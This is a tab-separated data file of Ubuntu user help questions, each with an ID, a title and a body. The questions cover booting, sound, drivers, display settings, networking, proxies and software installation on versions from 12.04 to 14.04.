503419	how can i make a triple boot	currently i am using a dual boot with windows7 and ubuntu 12.04lts . i would like to try windows8 . not because i like it , but more and more people are using it . i have created a partition where i would like to install it . i have only one physical drive . what should i do to create a triple-boot and do n't mess up my ubuntu ? this is my primary os . but occasionally i need my windows7 .
503424	computer freezes surfing the web	os - 12.04 64 bit ram - 8 gb cpu - intel® core™2 duo cpu e8400 @ 3.00ghz × 2 10 gb free space just surfing the web my cpu % goes to 80 % and my mem % goes over 50 % and then the os freezes and i have to alt & sysrq reisub to start again . this happens consistently when i go to sites with lots of pictures and video . here is my pstree : init─┬─networkmanager─┬─dhclient │ ├─dnsmasq │ └─2* [ { networkmanager } ] ├─accounts-daemon─── { accounts-daemon } ├─acpid ├─aptd ├─atd ├─avahi-daemon───avahi-daemon ├─bamfdaemon───2* [ { bamfdaemon } ] ├─bluetoothd ├─cav───14* [ { cav } ] ├─chrome─┬─chrome │ ├─chrome─┬─chrome │ │ └─2* [ { chrome } ] │ ├─chrome-sandbox───chrome─┬─chrome─┬─chrome───8* [ { chrome } ] │ │ │ └─chrome───5* [ { chrome } ] │ │ └─chrome-sandbox───nacl_helper │ └─41* [ { chrome } ] ├─cmdagent───26* [ { cmdagent } ] ├─cmgdaemon───3* [ { cmgdaemon } ] ├─colord───2* [ { colord } ] ├─console-kit-dae───64* [ { console-kit-dae } ] ├─cron ├─cupsd ├─2* [ dbus-daemon ] ├─dbus-launch ├─gconfd-2 ├─geoclue-master ├─6* [ getty ] ├─gnome-keyring-d───7* [ { gnome-keyring-d } ] ├─gnome-terminal─┬─bash───pstree │ ├─gnome-pty-helpe │ └─4* [ { gnome-terminal } ] ├─goa-daemon─── { goa-daemon } ├─gvfs-afc-volume─── { gvfs-afc-volume } ├─gvfs-fuse-daemo───3* [ { gvfs-fuse-daemo } ] ├─gvfs-gdu-volume ├─gvfs-gphoto2-vo ├─gvfsd ├─gvfsd-burn ├─gvfsd-metadata ├─gvfsd-trash ├─hud-service───3* [ { hud-service } ] ├─indicator-appli─── { indicator-appli } ├─indicator-datet───2* [ { indicator-datet } ] ├─indicator-messa─── { indicator-messa } ├─indicator-print───2* [ { indicator-print } ] ├─indicator-sessi───2* [ { indicator-sessi } ] ├─indicator-sound───2* [ { indicator-sound } ] ├─irqbalance ├─lightdm─┬─xorg───2* [ { xorg } ] │ ├─lightdm─┬─gnome-session─┬─bluetooth-apple───2* [ { bluetooth-appl+ │ │ │ ├─compiz─┬─sh───gtk-window-deco───2* [ { + │ │ │ │ └─4* [ { compiz } ] │ │ │ ├─deja-dup-monito─┬─deja-dup───3* [ { dej+ │ │ │ │ └─3* [ { deja-dup-monit+ │ │ │ ├─gdu-notificatio───2* [ { gdu-notificati+ │ │ │ ├─gnome-fallback-───2* [ { gnome-fallback+ │ │ │ ├─gnome-screensav───2* [ { gnome-screensa+ │ │ │ ├─gnome-settings-───2* [ { gnome-settings+ │ │ │ ├─nautilus───2* [ { nautilus } ] │ │ │ ├─nm-applet───2* [ { nm-applet } ] │ │ │ ├─polkit-gnome-au───2* [ { polkit-gnome-a+ │ │ │ ├─ssh-agent │ │ │ ├─telepathy-indic───2* [ { telepathy-indi+ │ │ │ ├─update-notifier───2* [ { update-notifie+ │ │ │ ├─zeitgeist-datah─── { zeitgeist-datah } │ │ │ └─3* [ { gnome-session } ] │ │ └─ { lightdm } │ └─2* [ { lightdm } ] ├─mission-control───2* [ { mission-control } ] ├─modem-manager ├─polkitd─── { polkitd } ├─pulseaudio─┬─gconf-helper │ └─2* [ { pulseaudio } ] ├─rsyslogd───3* [ { rsyslogd } ] ├─rtkit-daemon───2* [ { rtkit-daemon } ] ├─ubuntu-geoip-pr───2* [ { ubuntu-geoip-pr } ] ├─udevd───2* [ udevd ] ├─udisks-daemon─┬─udisks-daemon │ └─2* [ { udisks-daemon } ] ├─unity-applicati───2* [ { unity-applicati } ] ├─unity-files-dae───2* [ { unity-files-dae } ] ├─unity-lens-vide─── { unity-lens-vide } ├─unity-music-dae─── { unity-music-dae } ├─unity-musicstor─── { unity-musicstor } ├─unity-panel-ser───3* [ { unity-panel-ser } ] ├─unity-scope-vid───2* [ { unity-scope-vid } ] ├─upowerd───2* [ { upowerd } ] ├─upstart-socket- ├─upstart-udev-br ├─whoopsie─── { whoopsie } ├─zeitgeist-daemo─── { zeitgeist-daemo } └─zeitgeist-fts─┬─cat └─ { zeitgeist-fts }
503429	no sound on ubuntu os	i 'm running unbutu 7.10 hand have no sound from riptide sound card , cdrom etc . everything appears to be turned on . is there something else i should do since i 'm new at this os .
503430	new admin account asking for a password ?	i 've made new admin account . i did not set a password for that account and it now asks me for the password . since i can access the account as it automatically logs on when the laptop is turned on , can i set a new password ?
503431	how do i stop ubuntu from overriding my setxkbmap settings ?	i have put the following in my .profile : rm -f executed.log echo `` .profile starting '' > > executed.log if [ `whoami` ! = `` root '' ] then setxkbmap -v > > executed.log setxkbmap -layout `` us '' -variant `` altgr-intl '' -option `` ctrl : nocaps '' echo `` setxkbmap executed '' > > executed.log setxkbmap -v > > executed.log fi echo `` .profile finished '' > > executed.log after startup the following log is written : [ 22:02:21 ] [ giorgio @ desmond : ~ ] $ cat executed.log .profile starting trying to build keymap using the following components : keycodes : evdev+aliases ( qwerty ) types : complete compat : complete symbols : pc+us ( altgr-intl ) +inet ( evdev ) geometry : pc ( pc105 ) setxkbmap executed trying to build keymap using the following components : keycodes : evdev+aliases ( qwerty ) types : complete compat : complete symbols : pc+us ( altgr-intl ) +inet ( evdev ) +ctrl ( nocaps ) geometry : pc ( pc105 ) .profile finished but after a graphical login i get : [ 22:02:23 ] [ giorgio @ desmond : ~ ] $ setxkbmap -v trying to build keymap using the following components : keycodes : evdev+aliases ( qwerty ) types : complete compat : complete symbols : pc+us+inet ( evdev ) geometry : pc ( pc105 ) it seems unity is overriding my settings , probably with the indicator keyboard applet or something similar . how do i disable it so that i can use my .profile settings ?
503437	how do i install vistablet penpad on ubuntu 14.04 ?	i am trying to install a vistablet penpad on ubuntu 14.04 , ive heard it has been done on 13.x . how do i do this ? thanks . and just for additional information : i can only left click and right click , not move the cursor around . http : //ubuntuforums.org/showthread.php ? t=879409 that is a link that shows a thread that looks like some of them got it working .
503439	how to open warcraft 3 with wine in resolution other than 800x600 ?	i just installed warcraft 3 with wine on ubuntu 14.04 and when i open it via `` wine war3.exe '' it opens with the screen all messed up where i can see the desktop and a small corner of the screen . so i tried to open warcraft 3 with `` wine war3.exe -opengl '' and when it loads it opens in 800x600 . when i go into the options > video and try to change the resolution to anything greater it reduces the window to 1/4 of the screen and i can see the desktop in the remaining space . i have tried checking the `` emulate desktop '' option within winecfg to my screen resolution of 1920x1080 and that does not make a difference . is it possible to run at a greater resolution ? 800x600 looks really bad . i would upload a picture but i do not have enough rep . if you think you can help me comment and i can send it to you .
503442	problem in background transparency on terminal	i rebooted my computer and after some changes with ubuntu tweak on my window manager theme , etc. , i came with this problem in my terminal . before the reboot , i could see the things behind the terminal perfectly , but now the transparency seems to be only working with the desktop background ( as shown a part in the picture ) . how can i solve this problem ? thanks
503443	no sound in any music player i choose in ubuntu 12.04	i ca n't find a method to get sound from any music player i have on ubuntu 12.04 . installing the program i downloaded the iso , made the disc and loaded the program to one half of the hard disc.the other half is windows xp . all my music programs and players work fine in xp , but those i loaded into ubuntu wo n't work . also . attempts to play an audio cd fails . here 's a specific : cd in the tray , vlc player appears on screen , tracks appear , track 1 selected , no sound . when volume increased , only static is heard . i can not use the command system as yet so the fix must be done via gui . thanks . i found the fix among previous threads : a muted item on the sound card . i can now play an audio disc in vlc from the tray . so far so good . i want to establish a library of music in ubuntu , starting with ripping from my favorite discs , and then downloading from the internet as i have done in windows xp . i have brasero and sound juicer installed in the software centre , but ca n't figure out how to open either of them .
503448	how to install qt3 runtime library ?	i was trying to install the driver for my usb modem on ubuntu 14.04 . i ran sudo ./install.sh it outputted the following in the terminal ... ... ... ... ... ... start install ... ... ... ... ... .. *** check for root ... and then this message appeared i 'm wondering how to install this library ? thank you ! update : the name of the modem is zte mf180s
503452	problem upon restarting ubuntu : grub rescue	i am new to ubuntu . i was restarting the system and got the following message : error : file '/boot/grub/i386-pc/extcmd.mod ' not found . entering rescue mode ... grub rescue > ' what do i do ?
503454	how to install on and boot from external ssd on uefi ?	i need an external ssd with kubuntu to boot on different computers . so i created livecd , booted from it , plugged external ssd . with the help of gparted i converted the ssd to gpt and created partitions . then i started installation as usual . of course , i used the efi partition and installed the bootloader on an external ssd . after installation , and upon rebooting , in the uefi i found 2 boot entries `` ubuntu '' . each of them works great : kubuntu loads and works . but , when i choose uefi boot entry `` uefi ts512 ... '' ( the label of my external ssd ) , for a moment ( less than second ) the string could n't open /efi/boot/fallback.efi 14 appears and then it changes to a screen showing minimal bash-like line editing is supported . so , what do i need to do in order to make this system work ?
503456	ca n't install driver for al500ac on ubuntu 14.04	i 'm trying to install a wi-fi driver for my wi-fi dongle on ubuntu . the guide says i should : extract the folder ( done ) then type sudo make ( done ) then type sudo apt-get install build-essential ( done ) and last type sudo modprobe 8812au . now this is where it stops , when i press enter i get the message : modprobe : fatal : module 8812au not found . the folder looks like this :
503459	truecrypt container sluggish data transfer only in ubuntu	i downloaded two setup files for truecrypt namely truecrypt-7.1a-linux-x86.tar.gz & truecrypt setup 7.1a.exe one for linux & one for my windows8 i installed both the files in respective oses & while in ubuntu i created an normal aes fat32 encrypted container of 250gb & utilised truecrypt native gui to do this . after mounting i started transferring files ( of ~2gb each ) . to my dismay the speed was extremely sluggish & dropped to 2-3mb/sec while my core2duo processor usage surmounted to 98 % , the machine overall was a standstill ! after dismounting i repeated mount & transfer files using linux native zulucrypt gui but received same sluggish transfer & high cpu usage while in win8 on the same machine using native truecrypt application i mounted & started data transfer but this time i got ~22mb/sec . so how come my ubuntu is n't providing good speed ?
503460	load .mobileconfig to iphone from ubuntu 12.04 lts	i 'm trying to use ubuntu 12.04 lts to create and load *.mobileconfig files ( normally created with iphone configuration utility ) onto an ios devices via usb cable . i am having 2 problems . i ca n't seem to mount the iphone ( ios 7.1.2 ) . this is not the `` trust '' bug ; my iphone does n't even display the trust question to begin with . i assume this means the iphone is not communicating with the server . i have installed `` libimobiledevice2 '' , `` libimobiledevice-utils '' , and `` ideviceinstaller '' , but ca n't seem to get them working . i would prefer a solution that allows me to manually mount and unmount the ios device , but just getting it to to work would be great at this point . i have checked that the usb cable works by syncing the iphone with a windows pc . i have n't been able to find a tutorial or information on how to load the *.mobileconfig file onto the iphone . so if anyone could point me to a tutorial , or explain the best way to accomplish this i would greatly appreciate it . please forgive me , but i 'm a n00b . so i 'll need very basic `` step-by-step '' style directions here .
503462	xrandr custom refresh rate unstable in games and with various applications	i am running ubuntu 14.04 on my notebook with nvidia optimus . default intel drivers , nvidia 340.24 + bumblebee . ( those problems are indipendent from nvidia , they persist with either nouveau and various nvidia drivers and either with bumblebee and nvidia prime ) when i connect my crt to the notebook through vga port , the crt tells the notebook the max refresh rate for every resolution is 85 hertz . this is not real . with 1024x768 i can go 90 hz and with 800x600 i can go 110 hz . this also happened on windows , but the solution was simple : i just set the custom resolution in intel panel . then if i open , for example , quake live , i can set the refresh rate to 90 . but there is a difference between the windows driver and xrandr . in windows , the 90 hz custom res is considered as an extension of the standard 1024x768 . in fact , if i choose 1024x768 than , in the refresh slider , i get 60,75,85 and 90 hz . in xrandr the custom resolution you add with -- addmode is considered an entirely different res . so if the standard 1024 can only go 85 hz , and i add 90 hz , all the inferior refresh rates for 1024 are called `` 1024x768 '' and you can just make : xrandr -- output vga1 -- mode 1024x768 -r 85 but if you do xrandr -- output vga1 -- mode 1024x768 -r 90 it does n't work . you have to make : xrandr -- output vga1 -- mode 1024x768_90.00 where 1024x768_90.00 is the name of the resolution you added . this leads to problems . for example , various games try to pick the highest refresh possible . so if it 's 110 , they still pick 85 . and even if you force it through the game it still is 85 . is n't there a way to just add a refresh rate to an already existing mode ? also , xrandr is having some strange behaviours . for instance : i do xrandr -- output vga1 -- mode `` 1024x768_90.00 '' and the refresh is set to 90 hz . but , if i open teamspeak , warsow or ubuntu sdk ( and probably other apps i do n't know about ) the resolution is set back to 85 and locked . this means that while those apps are running i ca n't have a custom rate . when i close them , i can again . this also happen when you start steam , but steam does n't lock the framerate . also , if i happen to use any xrandr command after having set new resolution , it returns 85 hz . to pick 90 hz again , i have to re-use the command for custom res three times . exatly three times . at the first twos both monitors turn black for a second and then back to 85 hz . the third time , only the crt turns black and goes 90 hz . this also happens with 800x600_110.00 , but not three times . ( i have n't counted but i 'm sure it is n't three ) all this happens both in lightdm and gdm . has someone got any clues ? also , is n't there any proprietary intel driver ? edit : i did some research , i would also like a way to disable edid since all i 've found did n't work .
503464	installing qt creator 3.1.2 on ubuntu 14.04 lts	i have found ppa and manual method to install qt creator 3.1.2 on ubuntu 14.04 lts . which one is more reliable ( has less bugs once installed ) ? the manual method offers 64 bit installation . what if i install using the ppa method ? will the 64 bit version be installed into 64 bit ubuntu ? may i expect some problems if not ? which one updates itself with ubuntu ? is gcc 4.9.1 supported ? i reckon that qt creator is somehow linked with kde . shall i expect some problems when using qt creator with ubuntu intead of kubuntu ?
503467	does live dvd totally erase windows ?	i 'm buying a new laptop august 13th , the asus x551mav-rcln06 is the front runner . it has the intel celeron n2830 dual core processor , 4 gb ram . the two options with the live dvd are to use the whole disc or load beside windows . it says all files will be erased if the whole disc is used . is the whole disc reformatted in this process , or is it just given a new index ? i prefer that the whole drive is returned to zeroes and ones so that there 's no chance that windows can interfere with my computer 's functioning . do i need to do something special for that , or does the live dvd take care of it ? i 'm getting the latest ubuntu , the 14.04lts . the reason i ask this is that once i reformatted a 500 gb hdd , and it took 36 hours . i know loading ubuntu only takes an hour or so , and that does n't seem like enough time to return a hdd to a blank condition before loading the new os . thanks ! ps if there is a good reason for me to load ubuntu beside windows , i will entertain doing that . is there ?
503468	run ubuntu hassle-free on asus n56jn-mb71	i was planning on buying the asus n56jn-mb71 . you can find the specs here : http : //www.microcenter.com/product/431925/n56jn-mb71_156_laptop_computer_-_black_aluminum . i do not know anything about ubuntu , drivers etc but i do know that i need to install ubuntu on whichever laptop i buy . so , will i be able to install ubuntu on this laptop and have the sound , graphics , display etc work hassle-free ? i know this may be a stupid question but i really need help regarding this and i have no knowledge about all this . thank you ! any help is appreciated .
503472	huawei e5776 not detected as mobile broadband modem ubuntu 14.04	when connecting the device with a usb cable lsusb command crashes in the terminal . dmesg shows more errors , any ideas how on to fix these ? [ 12852.415901 ] cpu : 2 pid : 783 comm : modemmanager tainted : g w 3.13.0-24-generic # 47~precise2-ubuntu [ 12852.415992 ] hardware name : emachines eme732/hm55_cp , bios v1.01 08/13/2010 [ 12852.416058 ] task : f53ab3c0 ti : ebaa6000 task.ti : ebaa6000 [ 12852.416112 ] eip : 0060 : [ < f881567e > ] eflags : 00010283 cpu : 2 [ 12852.416168 ] eip is at usb_wwan_write+0x10e/0x2c0 [ usb_wwan ] [ 12852.416222 ] eax : 00000001 ebx : e3c45240 ecx : 00000001 edx : f2708000 [ 12852.416283 ] esi : 00000000 edi : 00000000 ebp : ebaa7e9c esp : ebaa7e50 [ 12852.416343 ] ds : 007b es : 007b fs : 00d8 gs : 00e0 ss : 0068 [ 12852.416396 ] cr0 : 80050033 cr2 : 00000040 cr3 : 2ba46000 cr4 : 000007f0 [ 12852.416455 ] stack : [ 12852.416477 ] ebcd1be8 ebaa7ea8 c13e26a0 00000078 ebaa7e64 00000000 00000001 00001c04 [ 12852.416631 ] ebec6db8 e3c45288 ebec6c00 e3c45280 f2708000 f3ad2df0 00000001 00000001 [ 12852.416780 ] f8882000 f1f3c600 00000007 ebaa7ed4 f856b751 00000001 00000296 c13e2bde [ 12852.416930 ] call trace : [ 12852.416983 ] [ < c13e26a0 > ] ? tty_mode_ioctl+0xa0/0x510 [ 12852.417071 ] [ < f856b751 > ] serial_write+0x51/0xd0 [ usbserial ] [ 12852.417159 ] [ < c13e2bde > ] ? n_tty_ioctl_helper+0x2e/0x70 [ 12852.417245 ] [ < c13dec13 > ] n_tty_write+0x143/0x340 [ 12852.417325 ] [ < c1087930 > ] ? try_to_wake_up+0x1a0/0x1a0 [ 12852.417409 ] [ < c13dbd11 > ] tty_write+0x101/0x210 [ 12852.417480 ] [ < c13dead0 > ] ? process_echoes+0x70/0x70 [ 12852.417558 ] [ < c13dbc10 > ] ? tty_write_lock+0x50/0x50 [ 12852.417639 ] [ < c1181c9d > ] vfs_write+0x9d/0x1e0 [ 12852.417710 ] [ < c10b738b > ] ? ktime_get_ts+0x4b/0x120 [ 12852.417787 ] [ < c1182167 > ] sys_write+0x57/0xa0 [ 12852.417862 ] [ < c168d3cd > ] sysenter_do_call+0x12/0x28 [ 12852.417936 ] code : 02 8b 40 08 e8 94 2e cb c8 85 c0 0f 88 fc 00 00 00 81 7c 24 3c 00 10 00 00 b8 00 10 00 00 0f 4e 44 24 3c 8b 54 24 30 89 44 24 38 < 8b > 47 40 8b 4c 24 38 e8 c6 73 af c8 8b 54 24 38 8b 44 24 34 89 [ 12852.418518 ] eip : [ < f881567e > ] usb_wwan_write+0x10e/0x2c0 [ usb_wwan ] ss : esp 0068 : ebaa7e50 [ 12852.418651 ] cr2 : 0000000000000040 [ 12852.438142 ] -- - [ end trace 930c0f6428b9e4a5 ] -- - [ 12856.711325 ] iso 9660 extensions : microsoft joliet level 1 [ 12856.712596 ] isofs : changing to secondary root [ 12868.212757 ] systemd-hostnamed [ 7469 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! [ 14286.575679 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 [ 14286.575793 ] option 2-1.2:1.0 : device disconnected [ 14286.578010 ] option1 ttyusb1 : option_instat_callback : error -108 [ 17268.800803 ] usb 2-1.2 : usb disconnect , device number 6
503475	cd/dvd drive not recognizing media	i am using ubuntu 12.04 . i do think my cd/dvd drive is not working properly since it does not recognize the dvd+r that i insert . using the disk utility program , it says there is no media in the drive . are there possible drivers that i am missing ?
503478	ca n't use wireless network in virtualbox ?	i 'm trying to enable wireless on virtualbox in my ubuntu 14.04 in a kali linux , but this os not show the wi-fi for i connect . and after i on my os do not show the wi-fi i already tried to use this link and this link and others , but my virtualbox not enable my wireless .
503480	ncsa_auth squid on ubuntu installation authentication	i installed squid on ubuntu server 12.04. worked smoothly . after transparet mode to run iptables-t nat-a postrouting-s 192.168.2.0/24-o eth0-j masquerade i have run . and i got out to the internet . i hang out when i point the browser proxy settings on the password screen comes up , but as iptables rules iptables-t nat-a prerouting-i eth1-p tcp - dport 80-j dnat - to-destination 192.168.2.1:3128 iptables-t nat-a prerouting-i eth1-p tcp-m tcp - dport 80-j redirect - to-ports 3128 in transparent mode , while adding rules even though the screen does not come password . i wonder where am i doing wrong ? additional information : internet eth0 192.168.1.3 192.168.2.1 lan eth1 lan 192.168.2.0/24
503481	optical ps/2 mouse freezing , unfreezing	no usb adapter , straight ps/2 mouse occasionally freezing : the pointer is , while both buttons are working . goes back to normal when unplugged/plugged back in . i have read somewhere that legacy usb support has to be disabled in bios , which i 've done with no affect on mouse behavior : it is a ps/2 mouse after all . such a behavior never has been noted in windows and in freshly installed mint xfce .
503482	how do i dual boot ubuntu and chromium os on the same hard drive extracted from vmware virtual disk ?	i have a chromium os installation in a vmware virtual machine that i want to move to a partition on my pc and dual boot it with two ubuntu installations on the same disk . how would i go about this and does it need to chain-load a bootloader or can i simply use grub or something as the bootloader ? my pc is a mid 2013 model , at least that is when i bought it . it was the last windows 7 pc still on staple 's shelves so it has standard bios not the uefi mess that currently runs on many pcs . how would i go about doing this ?
503484	how to compile a sh file so it can be uploaded to ppa launchpad	i want to make a few installation scripts via .sh files , and then upload them to http : //launchpad.net ? how would i do that ?
503487	external monitor horizontal lines problem	i got problem with my external monitor ( dell u2312hm ) connected to my laptop ( radeon hd4570 ) . there are appearing some horizontal lines . it is like blinking or flickering , it 's actually quite hard to explain , looks like some kind of artifacts . i 'm using standard graphic drivers provided by canonical , legacy one from amd do n't wont to install on this version of ubuntu ( 14.04 ) . i tested it with different cables both hdmi and vga and also on windows . problem seems only occur on native resolution ( using resolutions below native does n't show this lines ) , using ubuntu and external monitor . and maybe it 's worth mentioning , on login screen everything is perfectly fine . how can i get rid of it ?
503492	i have an encrypted partition for the which i need to recover the passphrase to recover data	i have a dual boot ubuntu 14.04 along side ubuntu studio 14.04 . my ubuntu works well but i have all my data on the ubuntu studio partition - that i can no longer access . how can i recover the partition and the passphrase that goes along with it ? ubuntu on sda1 ubuntu studio on sda6
503493	no desktop after login ?	so i just installed ubuntu minimal 64bit and when i login it just leaves me on what looks like a command page that says jerric @ jerric-hp : ~ $ . i do n't have windows anymore , i think . what do i do ? edit : do n't bother , anymore . i 'm just going to reset my computer back to windows . thanks for trying guys : ) ill leave this up incase it helps anyone else .
503495	ubuntu 14.04 desktop install stuck in loop at where are you	i 'm installing ubuntu 14.04 64-bit desktop . i 'm using all defaults and after accepting `` erase disk and install ubuntu '' i click the `` install now '' button . immediately , the `` where are you ? '' form comes up with a small error window showing `` ? ? ? ? ? ? '' in both the error window 's text and header . the pointer is still active . the `` continue '' button seems to be active but ignores clicks . i ca n't click anywhere on the entire screen with the exception of the `` ok '' button in the error window . once i click that i 'm taken back to the previous `` install now '' button . seems like i 'm stuck in a loop . thanks , curt i5 asus z97-ar mobo 16gb ram 2 x 4tb hard drives
503496	d-link wireless network usb will not auto-reconnect	d-link wireless network usb will not auto-reconnect . i 'm connecting to a dual band linksys router ... the windows computers disconnect also , but they auto-reconnect ... so , i 'm wondering ... is there a program to auto-reconnect to the router ? ? ?
503498	recent download	i just downloaded ubuntu from the website & had it saved under my documents but i ca n't seem to figure out how to get to the next phase of it being installed & running on my laptop . most all the instructions i 've come across do n't seem to mention anything other than when i reboot i should be given the option to choose to run it or windows ... not sure if this is before or after the installer should be done or how it is to be done . a little help & guidance will be appreciated , thank you .
503499	how do i get an aftermarket 360 controller to work ?	this has been asked before but there was no solution found . basically i 'm trying to get a rock candy xbox 360 controller to work in ubuntu . here 's what i know so far.. the controller shows up as bus 006 device 002 : id 0e6f:011f logic3 when xpad is installed ( default for ubuntu ) it shows up and is functional in jstest-gtk except for the right jotstick which only works for vertical up and down movement ( and is stuck aiming left ) . when xboxdrv is installed and xpad is removed and blacklisted ( /etc/modprobe.d/blacklist.conf ) it does n't even show up in jstest-gtk . any help would be appreciated !
503504	triple boot win7pro/win7basic and ubuntu	i 'm looking to triple boot my eeepc 1000he with win7 and ubuntu ! i have win7 pro on one partition , win7 basic on another , and i 'm thinking of creating a new partition ( obviously ) for ubuntu . can this be done without messing my win7 's ? if so how ? thanks in advance
503506	no sound after upgrade to 12.04 hwe	recently i have upgraded my asus b43s from 12.04 to 12.04 hwe and have lost all audio upon start up . when going to the sound setting , there are no devices available . once i run command `` lspci | grep audio '' in the terminal , my audio comes back . if i shutdown or restart , i have to do the same thing over again before the sound is available . is there anything that can be done to have the sound available on start up ? below is the output from lspci | grep audio . 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] caicos hdmi audio [ radeon hd 6400 series ]
503508	how do i install eclipse luna and jdk8 to work in ubuntu studio using xfce ?	i tried following guides online to install eclipse , but i 'm not sure if it was supposed to work for my distro . i 'm also unsure if openjdk 8 is the same thing as jdk8 for linux and whether or not it 's installed on ubuntu . i followed the guide here , but the commands stop working as soon as the unity-related commands are used : how to install eclipse ?
503510	2 errors found while checking before installation	i recently bought a new laptop with windows 8.1 installed , and i have been going through the steps to try installing ubuntu . i am using a usb for installation , and i am coming across a problem . after i restart the computer and encounter the screen which allows me to choose which os to start , i choose to check the disk for errors , and the test reveals that there are two errors . that 's all it says . i tried deleting everything on the usb , re-downloading ubuntu , and starting over again , thinking that something went wrong during the first time downloading . however , i find the same exact problem with the newly downloaded ubuntu . i do n't really want to install ubuntu if i am going to encounter problems laterâi am using this laptop for school . i found a previous posting of someone who seemed to have the same exact problem a while back , but they eventually just installed ubuntu regardless . here is the link to that postâerrors found doing diskcheck . any ideas what 's going on ?
503512	network icon providing connection feedback	i 've noticed at least two network icon animations during a typical start up sequence . the first animation appears to be the animation of a single , highlighted band on the icon 's four parts moving back-and-forth , top to bottom to top , etc . the second animation appears to be the animation of again , a single , highlighted band on the icon 's four parts , which starts from the bottom ( the dot ) and travels upward and outward , to the top arc of the icon , and repeats , bottom to top , bottom to top . what stages do the different animations indicate , in other words , what parts of the network establishment do the different animation stages correspond to ? can the animation provide useful feedback to someone with network problems ? related question : what terminal command line can i enter to give me feedback on ubuntu 's progress in its establishment of its network connection ? i.e. , is there a command that will tell me where the network establishment process is at if it 's having trouble establishing a connection ? regards , dr doug
503517	can you develop plugins for ubuntu 's browser yet ?	can you develop plugins for ubuntu 's browser yet ? is there a framework available yet ?
503518	question about sudo fdisk -1	i 've been trying to mount an external hdd to my ubuntu server ( 14.04 ) but when i try to use the sudo fdisk -1 function it tells me that its an invalid option , is there any way i can fix this ? or any other way i can go about to mount the external hdd and share is using samba ? cheers , jarryd
503520	file manager not following system preferences	the menu bar of my file manager is in the window and all other applications have it in the system bar . how do i fix this issue ? image here http : //i.imgur.com/6nxphhz.jpg
503521	how to create my user name and password	i just bought my new hp laptop and the os is ubuntu . it never asked for my password when i first used it and i never made one . every time i try to add or download stuff it always asks for my password that i never made . please help me .
503523	unable to use `` pip install scp '' command in ubuntu 12.04	i am new to the ubuntu/linux world . while try to run my python script i get the following error : root @ ubuntu : /home/haris/downloads/ # python install.py traceback ( most recent call last ) : file `` install.py '' , line 35 , in < module > import scp importerror : no module named scp so i tried to run the following command : root @ ubuntu : /home/haris/downloads/ee-scale/tools/os-installer # pip install python-scp downloading/unpacking python-scp can not fetch index base url http : //pypi.python.org/simple/ could not find any downloads that satisfy the requirement scp no distributions at all found for scp storing complete log in /root/.pip/pip.log how do i install scp on ubuntu 12.04 ?
503525	how to install a cisco valet connector without internet ?	i installed ubuntu to try it out . my computer doesnât have internal internet card . so i would like to use cisco valet connector . my question is how do i install it ? i ca n't open an exe file , i ca n't install wine because there is no internet . any other way ?
503529	getting back to ubuntu from chrome on pixel chromebook	i installed ubuntu via crouton on my pixel but now after turning computer off i ca n't figure out how to get back to ubuntu . i tried ctrl-alt-shift and back but it is n't working now . bill
503530	how do i add zero padding to filenames that already have numbers in them ?	i used sound juicer to rip a cd of audio for a language learning book so that i could listen to them on my android . however , sound juicer seems to only have the option of numbering files without leading zeros . like this : track_1.mp3 track_10.mp3 track_11.mp3 this leads to some confused ordering on my music player . so , i want to add some zeros to the name , so that they 're ordered properly , like this : track_01.mp3 track_02.mp3 track_03.mp3 how do i accomplish this ? i tried using gprename , but while it has the ability to add numbers , it does n't seem to have any options for adding leading zeros . is there a better program or something i can do at the command line ?
503532	ubuntu 14.04 install error with windows 7 install inside	i am using windows 7 64 bit on my pc and installed ubuntu 12.10 version with the `` install inside '' option . after the release of 14.04 i uninstalled the earlier version and installed the newer version . but it is not working correctly or loading after the complete installation process . i installed it with the install inside option as well . the error messages shown are below . when manual recovery option is selected
503536	installing mysql in other partition	i am trying to install mysql in other partition on fresh ubuntu 14.04 . i 'm doing this and getting the errors below . please help me , i 'm new to ubuntu . apt-get update apt-get install mysql-server php5-mysql mysql_install_db -- user=root -- basedir=/home/ubuntu/sql1/mysql -- datadir=/home/ubuntu/sql1/mysql/datadir** **fatal error : could not find my_print_defaults the following directories were searched : /home/ubuntu/sql1/mysql/bin /home/ubuntu/sql1/mysql/extra if you compiled from source , you need to run 'make install ' to copy the software into the correct location ready for operation . if you are using a binary release , you must either be at the top level of the extracted archive , or pass the -- basedir option pointing to that location . **
503540	virtualbox and windows	i am trying to install windows 7 through virtualbox on my ubuntu 14.04 lts . i am unable to install it as everytime on the virtual machine it asks me to load drivers . i am made to understand that the drivers of windows 7 are integrated in the cd/dvd wich is used for installation . please help me out ... regards
503542	upgrading from ubuntu 14.04 to 14.04.1	will i be given an option to upgrade to ubuntu 14.04.1 from 14.04 when i bootup from a cd or usb drive ? or do i need to do a complete new install ? thank you .
503545	update to 12.04 blows away dual boot loader	i have a 32 bit 12.04 partition and a 64 bit 14.04 partition on this system . been running both for several weeks with no problem - wanted to test all the oddball stuff i 've accumulated to make sure it was 64 bit 14.04 friendly before i upgraded from 12.04 . today my software updater suggested a small ( 8.4 meg ) series of updates to 12.04 . after retrieving and installing the updates , it prompted me to reboot . when i did , and selected the 12.04 partition ( 14.04 is the default ) , my video was screwed up ... max screen resolution was 1280 x 1024 when i had been running 1920 x 1200 ( old nvidia card . ) tried a few fixes , got nowhere . sighed , and rebooted to launch the 14.04 partition to make sure it was still working okay . when i tried to reboot what had been the 14.04 partition , it loaded my 12.04 instance . the partition with 14.04 does n't show up anywhere . at least my video works fine when i boot this way ... i had nothing of importance on the new partition , so i am not desperate to fix this right away , but can anyone explain why applying the suggested updates when i was logged into my older 32 bit 12.04 partition would mean i can no longer boot into my newer 64 bit 14.04 partition ?
503546	error when mounting a disk	i have a computer with three disks . everything worked perfectly , but once began receiving an error when mounting a disk : error mounting system-managed device /dev/sdb2 : command-line `mount `` /mnt/f9156008-b197-4aae-b393-96ac75d634f5 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdb2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so ( udisks-error-quark , 0 ) what can i do to fix this error ?
